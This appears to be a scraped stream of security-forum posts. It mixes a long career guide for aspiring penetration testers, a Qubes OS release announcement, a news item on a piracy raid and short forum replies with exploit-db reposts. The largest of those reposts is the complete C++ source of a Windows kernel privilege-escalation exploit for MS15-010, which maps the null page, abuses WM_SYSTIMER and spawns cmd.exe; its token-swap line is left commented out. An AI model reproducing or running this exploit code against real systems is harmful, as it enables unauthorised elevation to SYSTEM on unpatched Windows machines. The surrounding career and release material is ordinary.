Provide feedback. If nothing worked and you have a few moments of time, explain why a certain question or remark didn’t work. Maybe the asker said something disrespectful or suggested that he doesn’t really want to learn things properly. Worst case, he’ll ignore your advice and you can choose to ignore him too. Best case, he’ll learn from your feedback and approach things differently next time.

Update: Check out The XY Problem

Sigh. Ok. Please, where to start?

Horizontal or vertical?

I don’t really care whether you prefer to stand up or to lie flat when learning new things. What I mean with the “horizontal or vertical” title is: should you focus on learning a broad variety of things first (horizontal), or should you dive directly into the area you’re interested in (vertical)? Good question. There are definitely pros and cons in both scenarios, and there are more opinions than people. Yours truly has been blessed with opinions as well, so I’ll share my personal view.

Understanding the big picture first is useful. If your goal is to become a web application pentester, it would probably make sense to learn all layers involved, ranging from operating systems, networking, web server & application technologies, commonly used database platforms and common development languages. This is a big animal. The amount of information you’re interested in usually depends on what you need. At the same time, the better you understand how things work, the easier it will be to understand how to bend the rules. My recommendation is: try to understand as much as you can about the various layers first. Don’t be impatient and dive into the nitty gritty details of finding bugs or exploiting right away. Especially the availability of tools will make your hands itchy and lower the hurdles to start attacking systems right away. Always keep in mind that tools are not magic. They simply automate things. The better you understand what they do, the easier it will be to use them. Don’t get me wrong, tools are useful. Just don’t use them until you understand what they do, how to configure them, how to use them properly.

So, I believe there is a lot of value in trying to understand the system engineering aspect of systems. Understand how things communicate, how things are set up, secured, and operate. Don’t overdo it either. You don’t need to be an IP expert that understands all the RFC specifications. You probably need more than just what it takes to abuse it: you’ll need enough to use it and abuse it. Furthermore, understand that you can take a phased approach. You don’t need to be a BGP routing expert to perform web application testing. It doesn’t hurt if you are, but you can still learn it when you’re ready to expand your horizon and dive into other aspects of security audits. Be realistic in the goals you set, and try to accurately determine the prerequisites needed to get there. Ask multiple opinions if you’re not sure and don’t be afraid to learn too much rather than not enough.

How to learn?

There are many ways to learn new things, some of them quite personal (as in: they only work for some of you, and not for others). Some people are able to learn new things by reading a book or blog post. Some need to visualise things, and others need someone to explain things in a video or face-to-face setting. There are solutions for every methodology. You can buy books or read publications online. You can take classes (online or in real life), and you can find lots of online challenges to practise your new skills. There is nothing wrong with any of these approaches, as long as you understand what works best for you, so you can adapt your strategy accordingly.
The common aspect of all of these learning methodologies is to get practice. Trying out things for yourself (guided or non-guided) will make it easier to remember and to eventually transform the knowledge into understanding & experience. In any case, having a virtual lab environment set up can be extremely useful. Nowadays, virtualization technology is available for most common platforms, it’s cheap/free and allows a great deal of flexibility. VirtualBox, VMware, Parallels, Xen and Hyper-V are just a few examples. Although this is not catch-all advice, you’ll get a long way by installing a Windows and a *Nix/Linux system. Of course, understanding how to manage & operate these systems is fundamentally important. You don’t want to spend your time fighting the tools that are supposed to support your learning experience.

Spoon-feeding

Spoon-feeding sounds like something we do to babies, right? If you ask experienced people whether spoon-feeding is right or wrong, I bet most of them will tell you it’s bad. I believe the answer is not black & white. It depends. First of all, we’ve all been spoon-fed (or at least most of us). This is what our parents did when we were not able to feed ourselves. This is what teachers do when you are entirely new to something. This is what we should be doing to put people on the right track. We’ve all been told certain things to allow us to practise, get better, and get to the next phase. There is a thin line between stimulating in a supportive way, and leaving people behind with no help whatsoever.

In “Leadership and the One Minute Manager – Increasing effectiveness through situational leadership II”, Ken Blanchard explains 4 different “development levels”. One of these levels is defined by high commitment and low competence. This may be the place where you are right now. You’re quite excited about learning something new, but you have no idea where to start. For scenarios like this, some spoon-feeding can be useful. It doesn’t mean that someone else will do all of the hard work for you, but simply being told to “go figure it out” without giving directed pointers or hints is not useful either.

As soon as you learn more (and become more competent), you’ll discover that there is much more to learn. At this point, you may find yourself becoming less committed, because you’re starting to realise there is still a long road ahead (which can be quite demotivating). This is normal too. At this point, spoon-feeding won’t help. In this case, coaching is more appropriate. Asking the right questions will force people to think, to apply the knowledge they already have, and to look for answers. If they’re stuck after all, and have no way to discover answers themselves, perhaps it’s time to take one step back and get some detailed help after all. So – please be careful when being negative about spoon-feeding. The situation (development level) determines whether it’s the right approach or not.

Anything else?

No, not really. Thanks for asking. Time to start drawing the tree that will become your journey.

1. Networking & operating systems

I would suggest starting by learning how systems work and communicate. Try to get a good understanding of TCP/IP, OSI layers, ephemeral & server ports, routing, port forwarding, NAT, firewalling, etc. You’ll need it when trying to connect to targets, you’ll need it to use tools, and you’ll need it to configure your environment to allow your security audits to be successful. You’ll also need to be able to manage & operate common operating systems. Together with networking, this should be your primary starting point. Most of us are familiar with one operating system, but it “doesn’t hurt” (= understatement) to understand how to use and configure both Windows and Linux/Unix. You should become fluent in setting up networking configurations and basic security features & implementations, using both command line utilities and GUI tools.
Start to use these systems as your main desktop, use them on a daily basis in order to force yourself to become familiar with them. I know, I know, you’d like to start attacking systems right away, without spending too much “overhead”, right? I fully understand that it sounds very exciting to start using portscanners or other tools right away, but what’s the point in using the tools if you don’t know what the output of the tools means? Even worse, you could easily cause damage if you don’t know what you’re doing.

2. Multi-purpose resources

Next, try to get a broad understanding of the attack landscape. Maybe you already made up your mind about becoming a web application pentester, but it still doesn’t hurt to understand what else is out there. There are many resources on this topic, but I decided to list the most important ones (at least the ones that cover a wide spectrum of skills):
A hands-on introduction to hacking
Grey Hat Hacking – The Ethical Hackers Handbook
“Hacking Exposed” series
Professional Penetration Testing

(If you feel an important resource is missing, let me know. Oh, and to the publishers/authors: if you would like to provide our readers with a discount coupon code, please contact me.)

Aside from getting a better view on the landscape, you’ll learn a few things about pentesting methodologies & approaches, including the difficult art of translating technical findings into something a customer or business can use and understand. Being a pentester does involve paperwork too. Just sayin’. Again, apply the true hacker mindset. Break stuff because you want to make it better, not because you want to break it. Without truly trying to “make things better” in reality, you’re just a breaker. (So – don’t complain about mistakes others made. Think & fix. Add value. Learn how to secure, harden and protect as well.)

3. Scripting & Tools

No matter how long you look at it, you’ll end up using scripts and tools that automate certain things. You may even want to change existing tools or write your own to make your life easier. After all, that’s what scripts are for. They are a tool, not a goal. Becoming familiar with scripting languages such as python and ruby is a must. You don’t need to be an expert; you’ll get better as you start to use them. Understanding some C / C++ can be useful too, as some people tend to write tools in lower-level languages (mostly for performance reasons). In any case, understanding what a tool does is more important than writing your own. Writing your own can be useful, because it proves that you understand what needs to be done.

This is probably a good time to start using a so-called “penetration distro”, a pre-configured system that contains a large series of security assessment tools. Trying to create your own system from scratch can be helpful, but it’s also time consuming and probably not necessary until you fully master the ones that already exist. Kali Linux is one of the most commonly used/popular distributions. It has a large userbase and is well supported by most tool developers. In addition to the more attacker-oriented tools, it’s also a good idea to expand your lab environment and include local and online systems that are designed to be vulnerable, allowing you to test your knowledge using the tools available. If you’re into web application security, a good place to start is https://www.pentesterlab.com/exercises or http://www.amanhardikar.com/mindmaps/PracticeUrls.html. You’ll find more links on the websites listed below.

4. Dive deeper

Only when you’re ready, pick the target or targets you want, and create a realistic action plan to achieve the goal. Some topics will take days, others will take weeks, months, maybe years to understand. Take your time, one step at a time. For each type of target, you’ll find specific resources (books, online publications, classes, virtual labs, etc).
Some good resources include the websites listed here:
https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
http://wiki.securityweekly.com/wiki/index.php/Penetration_Testing_Tips_&_Tricks
https://github.com/enaqx/awesome-pentest
https://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents
http://www.dfir.org/?q=node/8
https://www.owasp.org/index.php/The_OWASP_Testing_Framework
http://www.pentest-standard.org

(Don’t forget to ask questions as you work your way through resources & materials.)

Although I encourage everyone to find their own area of expertise, if you are serious about becoming a professional pentester, you will have to learn a thing or two about web application security. After all, a lot of companies use web application services to serve applications to their employees, customers, partners, suppliers, etc. Since web applications need to be exposed to the outside world in a lot of cases, they are also an important target (and a way in for criminals). Understanding how HTTP works, how web applications are developed and secured, and how underlying database platforms work, will make up a big part of the journey. Your mission, if you choose to accept it, is to find the dependencies and prerequisites that are required to dive deeper into the area you would like to focus on, and to translate those into an action plan. Again, simply ask questions whenever needed.

5. Listen, engage, help

Use social media to follow influencers, people that have inspired others, and just more experienced people in general. Engage with people, be nice. Ask questions and help as you learn. If you have the opportunity to attend Infosec conferences/seminars: please do so. It’s a great way to meet more experienced people and talk with them. Ask them what they are working on. Share what you are doing and ask for tips. Ask them who they look up to, or were inspired by, and check them out too. Become part of the community. (Oh btw – conferences are great places to find a new job too.)

Open a website/blog, share your findings. Sure, you may not be the first person to go down a particular road… but you won’t be the last either. Environments & technology change, so as you apply your newly acquired knowledge, try to keep track of your progress & document how it applies to the latest technology. In fact, you’ll probably end up taking notes as you learn anyway. You might as well structure them and put them online for others to see. Potential employers may not be so interested in *what* you post, but rather focus on how you structure your notes, your thoughts, and your potentially innovative approach to things. Make your work visible and teach it to others. Don’t be afraid to make mistakes. You’ll get there. All it needs is time and effort. Good luck.

6. Don’t be stupid

Unless you’re attacking your own system, or you have obtained proper permission to do so, attacking a system (on a network, locally, physically, etc) is a crime. Don’t be stupid.

What’s next?

What to consider when trying to get a job as a pentester

In all honesty, it may not be so easy to break into information security and get a job as a pentester. In fact, it’s pretty hard to get into that area professionally (unless you have a desire and business plan that justifies becoming self employed). In general, companies tend to prefer hiring experienced pentesters. After all, most companies want to get “return on investment” as fast as possible, which means they don’t really want to invest too much time in training you and letting you become more experienced first before they can rely on you to take on assignments. Not all is lost though. Some companies may offer (summer) internships or may give junior profiles a break… but nothing beats experience. Agreed, it sounds like a catch-22 situation. I guess the key is to find a way to gain more “experience”, or “credible ability”.
You can gain experience by playing CTFs, by testing your skills in simulated environments and/or by getting certified. Becoming an “Offensive Security” certified penetration tester or passing SANS exams can be a good investment, as it is well regarded in the industry… and there are certainly other similar “titles” you can earn while you’re at it. I agree, proven experience/knowledge is more important than a title (and some titles don’t even guarantee knowledge), but unfortunately you may not be able to get a seat at the job interview table without a title in the first place.

So, to encourage companies to speak up, I decided to tweet this: so… if you’re reading this post and you work at a company that is willing to hire (relatively) inexperienced pentesters (at least, without a lot of professional experience), please let me know (i.e. get me a formal statement, a link to your website that contains more information) and I’ll add the link to this post. If you have a (summer) internship program, please let me know too. Any help is much appreciated. In fact, I strongly believe that companies tend to underestimate the true power of having a junior profile in the team. Benefits include a fresh view on challenges (fresh = less impacted by routine) and pushing everyone to stretch their comfort zones. Everybody wins.

So far, the following people/companies responded & allowed me to post a link here (or tweeted their policy on the matter):
KPN // the Netherlands
ERNW // Germany (internships) : ernw.de / info@ernw.de
Kyos // Switzerland (internships)
NetXP // Paris, France (junior/interns) : netxp.fr / recrutement@netxp.fr
Milton Security // USA (junior positions for recent Veterans, internships)
NCC Group // USA (junior positions)
Nettitude // UK & USA (interns)
Attifyme (Remote security internships on Mobile & IoT)
Solucom // Paris, France (juniors/interns) : solucom.net/careers
SalesForce // US (summer internships for BS/MS students) : http://salesforce.careermount.com/candidate/job_search/advanced/results/1?sort_dir=desc&industry=5571&sort_field=post_date
iSIGHT Partners // US (interns)
MWRLabs // various locations (juniors/interns)
SakurityNetwork // Russia (Juniors) : http://sakurity.com/jobs
IOActive // various locations (Juniors/Interns) : careers@ioactive.com
ISE (interns) : https://twitter.com/lisa_a_green
EdgeScan // Ireland
LinkedIn Internships
YearUp
Securify // the Netherlands (Juniors) : https://www.securify.nl/jobs
NetSPI
Toreon // Belgium : https://www.toreon.com/category/news/ – https://twitter.com/toreon_BE
Facebook (Internships)
Facebook University (FBU)

(Check out the twitter thread, there may be some other companies that haven’t agreed on posting a link yet, or just don’t want me to post a link here.)

Warning: Before getting too excited & sending messages to all of the above, think about it for a moment. These companies won’t have unlimited seats. They’re not looking forward to processing millions of applications either. Be creative. What will you do to make sure your profile will get the attention it deserves? What added value will you bring to the company? Put in some effort, make sure your message stands out amongst the others. Also, please keep in mind that the offers may be limited in time and number of people. On the other hand, there may be other companies out there that might want to give you a break. Use social media, use your network. Don’t give up.

Finally, don’t contact me to help you find a job. I am not a recruiter, and don’t want to become a middle man either. I’d like to encourage companies to speak up and for you to take some initiative too. You can do this. Be smart.

What to expect as part of your life as a pentester

Well… I don’t know, I’m not a pentester… but I wouldn’t expect to be able to hide in a basement for years. Depending on your geographical location and your customer base, you’ll probably end up having to travel to clients, have meetings (remote, on location), write reports, articulate technical findings into actionable information, present findings, work with clients to fix issues… Exciting times ahead!

Reddit

Reddit has some threads related to infosec and hiring:
https://www.reddit.com/r/netsec (Infosec related topics)
https://www.reddit.com/r/netsec/comments/3n5qne/rnetsecs_q4_2015_information_security_hiring (quarterly hiring thread, link changes every quarter). Some companies will hire junior profiles from that thread.

Outro

I am certainly not the only person who would like to share a view on getting a job in infosec. In fact, hacks4pancakes posted an article which pretty much deals with the same topic (but maybe presents a different/new angle): http://tisiphone.net/2015/10/12/starting-an-infosec-career-the-megamix-chapters-1-3/ Go check it out, I believe our posts complement each other well.

© 2015, Corelan Team (corelanc0d3r). All rights reserved.

Source: https://www.corelan.be/index.php/2015/10/13/how-to-become-a-pentester/
-
[h=1]Microsoft Windows - Local Privilege Escalation (MS15-010)[/h]

```cpp
// ex.cpp
/*
	Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
	CVE-2015-0003
	March 2015 (Public Release: May 24, 2015)
	Tested on:
		x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
		x64: Win 2k8 SP1 | Win 2k8 R2 SP1
	Author: Skylake - skylake <at> mail <dot> com
*/

#include "ex.h"

_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
_PsLookupProcessByProcessId PsLookupProcessByProcessId;
_PsReferencePrimaryToken PsReferencePrimaryToken;
DWORD Pid;
ATOM atom;
BOOL KrnlMode, bSpawned;

DWORD_PTR WINAPI pti()
{
#ifdef _M_X64
	LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
	return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
#else
	LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
	return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
#endif
}

BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )
{
	DWORD_PTR dwIndex, dwMask;
#ifdef _M_X64
	dwMask = ~0xf;
#else
	dwMask = ~7;
#endif
	// dwCurrentValue &= dwMask;
	for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )
	{
		if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )
		{
			// pdwStructure[dwIndex] = dwNewValue;
			return TRUE;
		}
	}
	return FALSE;
}

BOOL WINAPI Init()
{
	HMODULE hMod = NULL;
	PVOID Base = NULL;
	OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };
	PSYSTEM_MODULE_INFORMATION pm = NULL;
	BOOL RetVal = FALSE;
	__try
	{
		if( !GetVersionEx( &ov ) ) __leave;
		if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )
		{
			atom = 0xc039;
		}
		else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )
		{
			atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;
		}
		if( !atom ) __leave;
		_ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" );
		if( !ZwQuerySystemInformation ) __leave;
		ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" );
		if( !ZwAllocateVirtualMemory ) __leave;
		ULONG len;
		LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );
		if( !status ) __leave;
		pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len );
		if( !pm ) __leave;
		status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );
		if( status ) __leave;
		CHAR szKrnl[MAX_PATH] = { 0 }, *t;
		for( ULONG i = 0; i < pm->Count; ++i )
		{
			if( strstr( pm->Module[i].ImageName, "exe" ) )
			{
				t = strstr( pm->Module[i].ImageName, "nt" );
				if( t )
				{
					strcpy_s( szKrnl, _countof( szKrnl ) - 1, t );
					Base = pm->Module[i].Base;
					break;
				}
			}
		}
		hMod = LoadLibraryA( szKrnl );
		if( !hMod || !Base ) __leave;
		PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" );
		if( !PsLookupProcessByProcessId ) __leave;
		PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );
		PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" );
		if( !PsReferencePrimaryToken ) __leave;
		PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );
		Pid = GetCurrentProcessId();
		RetVal = TRUE;
	}
	__finally
	{
		if( pm ) LocalFree( pm );
		if( hMod ) FreeLibrary( hMod );
	}
	return RetVal;
}

LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
	LPVOID pCurProcess = NULL;
	LPVOID pSystemInfo = NULL;
	PACCESS_TOKEN systemToken;
	PACCESS_TOKEN targetToken;
	PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );
	PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );
	targetToken = PsReferencePrimaryToken( pCurProcess );
	systemToken = PsReferencePrimaryToken( pSystemInfo );
	// find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 );
	KrnlMode = TRUE;
	return 0;
}

VOID WINAPI leave()
{
	keybd_event( VK_ESCAPE, 0, 0, NULL );
	keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );
	keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );
}

LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )
{
	if( bSpawned )
	{
		leave();
		ExitProcess( 0 );
	}
	switch( message )
	{
	case WM_CREATE:
		SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );
		FlashWindow( hWnd, TRUE );
		keybd_event( VK_LWIN, 0, 0, NULL );
		break;
	case WM_CLOSE:
		DestroyWindow( hWnd );
		break;
	case WM_DESTROY:
		PostQuitMessage( 0 );
		break;
	case WM_TIMER:
		KillTimer( hWnd, ID_TIMER );
		leave();
		DestroyWindow( hWnd );
		break;
	default:
		return DefWindowProc( hWnd, message, wParam, lParam );
	}
	return 0;
}

int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow )
{
	WNDCLASSEX wc = { sizeof( WNDCLASSEX ) };
	HWND hWnd = NULL;
	MSG Msg = { 0 };
	SIZE_T size = 0x1000;
	LPVOID addr = ( LPVOID ) 1;
	if( !Init() ) return 1;
	if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )
	{
		// return 1;
	}
	DWORD_PTR p = pti();
	if( !p ) return 1;
#ifdef _M_X64
	*( ( PDWORD_PTR ) 0x10 ) = p;
	*( ( LPBYTE ) 0x2a ) = 4;
	*( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;
	*( ( PDWORD_PTR ) 0xa8 ) = 0x400;
	*( ( LPDWORD ) 0x404 ) = 1;
	*( ( PDWORD_PTR ) 0x408 ) = 0x800;
	*( ( LPWORD ) 0x410 ) = atom;
	*( ( LPBYTE ) 0x412 ) = 1;
#else
	*( ( LPDWORD ) 0x08 ) = p;
	*( ( LPBYTE ) 0x16 ) = 4;
	*( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;
	*( ( LPDWORD ) 0x6c ) = 0x400;
	*( ( LPDWORD ) 0x404 ) = 1;
	*( ( LPDWORD ) 0x408 ) = 0x800;
	*( ( LPWORD ) 0x40c ) = atom;
	*( ( LPBYTE ) 0x40e ) = 1;
#endif
	wc.lpfnWndProc = WndProc;
	wc.hInstance = hInstance;
	wc.lpszClassName = TEXT( "Class" );
	if( !RegisterClassEx( &wc ) ) return 1;
	hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL );
	if( !hWnd ) return 1;
	ShowWindow( hWnd, SW_HIDE );
	UpdateWindow( hWnd );
	while( GetMessage( &Msg, NULL, 0, 0 ) )
	{
		if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010
		{
			if( !KrnlMode )
			{
				Msg.hwnd = ( HWND ) NULL;
			}
			else
			{
				Msg.hwnd = hWnd;
				if( !bSpawned )
				{
					ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW );
					bSpawned = TRUE;
				}
			}
		}
		TranslateMessage( &Msg );
		DispatchMessage( &Msg );
	}
	return ( int ) Msg.wParam;
}
// EOF
```

```cpp
// ex.h
#pragma once
#include <windows.h>
#include <stdio.h>
#include <tchar.h>

typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect );
typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process );
typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process );

typedef enum _SYSTEM_INFORMATION_CLASS
{
	SystemBasicInformation = 0,
	SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength );

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
	HANDLE Section;
	PVOID MappedBase;
	PVOID Base;
	ULONG Size;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT PathLength;
	CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION
{
	ULONG Count;
	SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

#define ID_TIMER 0x1
#define WM_SYSTIMER 0x118
// EOF
```

Source: https://www.exploit-db.com/exploits/37098/
-
What programming language has the shortest 'Hello World' program?
Nytro replied to MrGrj's topic in Programare
Neither ASM, Java, Python, Perl, LISP, PHP nor the esoteric ones are programming languages.

```c
int main()
{
    /* shellcode that prints the message */
    return 0;
}
```
-
What programming language has the shortest 'Hello World' program?
Nytro replied to MrGrj's topic in Programare
HTML: "Hello, world." -
Nine searches in Bucharest at the homes of persons who allegedly retransmitted television programmes without authorisation. The damage is estimated at 1.5 million euro
by G.S. HotNews.ro, Monday, 12 October 2015, 8:50

The Romanian Police is carrying out nine searches this Monday morning within the municipality of Bucharest, at the homes of persons suspected of having caused damage of approximately 1,500,000 euro by making protected works (television programmes) available to the public, by using registered trademarks without the consent of their owners, and by money laundering, the General Inspectorate reports. Officers of the Economic Crime Investigation Directorate of the IGPR and prosecutors of the Prosecutor General's Office are searching the homes of four persons and the premises of companies controlled by them.

The investigation showed that, between 2013 and 2015, the suspects allegedly created several websites through which they made available to the public and retransmitted, for a fee, the programmes of restricted-access television stations, without the stations' consent, thereby violating copyright law. In order to sell the special receiver devices for these programmes and to collect money from subscribers, they allegedly set up numerous companies both in Romania and in other states (including offshore companies set up in Cyprus and in Delaware, USA). Using these companies, they allegedly disguised the transactions made and hid the income obtained from these illicit activities, a large part of the sums obtained this way being reinvested.

The damage caused by the criminal activity, as estimated so far, is approximately 1,500,000 euro.

Source: Nine searches in Bucharest at the homes of persons who allegedly retransmitted television programmes without authorisation. The damage is estimated at 1.5 million euro - Esential - HotNews.ro
-
chrome login data.
Nytro replied to theandruala's topic in Reverse engineering & exploit development
As far as I know: The CryptProtectData function performs encryption on the data in a DATA_BLOB structure. Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer. For information about exceptions, see Remarks. -
It can be watched live, right now.
-
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
Thanks. It no longer works on Chrome, but I have fixed it; the fix isn't on GitHub yet. I'll update it, I have been working on it some more, but I need to add some kind of licence to it so I don't get into trouble if others use it in an "ugly" way. -
Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)
Nytro replied to Nytro's topic in Exploituri
He probably uses a fuzzer, but he didn't discover them all in 2 days. They were discovered over a long period, for example a year. On exploit-db they were submitted in bulk (by him or by someone else) during that period, which is why they show up then. The Project Zero issues probably show more concrete dates. -
Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)
Nytro replied to Nytro's topic in Exploituri
I don't think Nils is the kind of person who would buy something like that. But I do think he's the kind of person who would find something like that. -
Qubes 3.0
Oct 1, 2015 • Joanna Rutkowska

About 5 months after the initial release of Qubes 3.0-rc1, we're now releasing the final 3.0 today! Let me quickly recap the main "killer features" of Qubes OS 3.0 compared to the Release 2:

- Qubes is now based on what we call Hypervisor Abstraction Layer (HAL), which decouples Qubes logic from the underlying hypervisor. This will allow us to easily switch the underlying hypervisors in the near future, perhaps even during the installation time, depending on the user needs (think tradeoffs between hardware compatibility and performance vs. security properties desired, such as e.g. reduction of covert channels between VMs, which might be of importance to some users). More philosophically-wise, this is a nice manifestation of how Qubes OS is really "not yet another virtualization system", but rather: a user of a virtualization system (such as Xen).
- We upgraded from Xen 4.1 to Xen 4.4 (now that was really easy thanks to HAL), which allowed for: 1) better hardware compatibility (e.g. UEFI coming soon in 3.1), 2) better performance (e.g. via Xen's libvchan that replaced our vchan). Also, new Qubes qrexec framework that has optimized performance for inter-VM services.
- We introduced officially supported Debian templates.
- And finally: we integrated Whonix templates, which optimize Tor workflows for Qubes.

As explained in our Release Cycle Documentation (something we finally created and have been polishing through this 3.0 branch development), there are almost no new features in 3.0 compared to 3.0-rc1, essentially only bugfixes, intermixed with a few minor improvements. But, while the 3.0 branch was "maturing", and getting bugfixes merged, most of our work has been focused on the 3.1 branch, which is adding a bunch of exciting new features, as indicated on our high-level roadmap, specifically:

- UEFI support (see this ticket for more info and test images).
- Live USB edition (preview for which we already released earlier this summer, now it will get merged into the master branch for 3.1)
- Management/pre-configuration stack: The Big Killer Feature of the upcoming 3.1 release, which will make it easy to provide out of the box configurations for things such as: out of the box Whonix/Tor, or Split GPG, or default USB sandboxing VM, which currently the user must do manually.

We're planning to release the first candidate for 3.1 as early as the end of October, actually.

But development of any serious project is not just adding new features, although that's admittedly the most exciting thing for any developer to do. In R3 we have finally started implementing this golden thought, and the first tangible outcome of this change of attitude is the automated testing framework which we have been using for all the releases in this 3.0 branch already. We hope this results in much more polished, stable code.

Other things we've started to increasingly prioritize recently, and plan to intensify in the coming year, are: 1) making Qubes more accessible to people (think easier to get hardware that can run Qubes OS), and 2) easier to use (better UX and UI). I think this is also pretty exciting, actually.

As previously announced earlier this summer, we have decided to dedicate this release of Qubes OS to the memory of Caspar Bowden: Caspar has been a proud user, supporter, and advocate for Qubes OS, and also a friend. I think he would have liked that dedication.

The Qubes 3.0 ISO can be downloaded from here. We have also released another scheduled Qubes Canary today.

I would like to thank all the people who have contributed to this huge effort of creating a new "reasonably secure" desktop OS. I believe we're making together an important and meaningful thing here. Let's keep this going!

Source: http://blog.invisiblethings.org/2015/10/01/qubes-30.html
-
[h=1]Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)[/h]

Source: https://code.google.com/p/google-security-research/issues/detail?id=474

---

The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliably on Win 7 32-bit with Special Pool enabled on win32k.sys

---

Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip

Source: https://www.exploit-db.com/exploits/38307/
-
[h=1]Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability[/h]

# Title: Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability
# Date: 09/28/2015
# Author: Reigning Shells, based off PoC published by Zero Day Initiative
# Vendor Homepage: adobe.com
# Version: Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X are vulnerable.
# Tested on: Adobe Acrobat 11.0.10 on Windows 7
# CVE : CVE-2015-3073

This vulnerability allows remote attackers to bypass API restrictions on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within AFParseDate. By creating a specially crafted PDF with specific JavaScript instructions, it is possible to bypass the Javascript API restrictions. A remote attacker could exploit this vulnerability to execute arbitrary code. Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X are vulnerable.

